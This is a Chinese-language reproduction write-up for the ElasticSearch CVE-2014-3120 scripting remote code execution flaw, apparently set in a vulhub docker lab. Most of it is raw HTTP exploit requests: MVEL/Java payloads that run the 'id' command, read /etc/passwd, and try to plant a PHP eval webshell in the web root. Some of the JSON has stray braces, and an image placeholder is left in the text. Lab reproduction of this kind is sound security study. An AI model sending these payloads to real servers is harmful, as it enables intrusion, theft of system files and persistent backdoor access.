漏洞简介

ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎。设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。支持通过HTTP使用JSON进行数据索引。
ElasticSearch有脚本执行的功能，使用的引擎为MVEL，该引擎没有做任何的防护，或者沙盒包装，所以可以直接执行任意代码。
由于在ElasticSearch的默认配置下，动态脚本执行功能处于打开状态，导致用户可以构造恶意的请求包，执行任意代码。

漏洞复现

通过_search方法的参数传入恶意代码，远程执行任意MVEL表达式和Java代码（如下图所示，ElasticSearch版本为1.1.1）

启动docker环境

cd vulhub/elasticsearch/CVE-2014-3120/
docker-compose up

访问http://127.0.0.1:9200/会出现Elasticsearch的信息

对其抓包进行post并创建一条数据

POST /website/blog/  HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 30{"name": "guiltyfet"
}

返回201状态码，代表创建成功
利用该漏洞的payload如下

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}
}}
}

其中JAVA等价于：

String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next();
//A means "start of string", and \z means "end of string".
String s2  = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next();
System.out.println(s1);在这里插入图片描述

既能执行任意代码，也能读取文件：

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\A\").next();"}}
}}
}

利用webshell失败

{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.util.*;import java.io.*;PrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"/var/www/html/mitian.php\", true)));writer.println(\"<?php @eval($_POST['kjsx']);?>\");writer.close();"}}
}}
}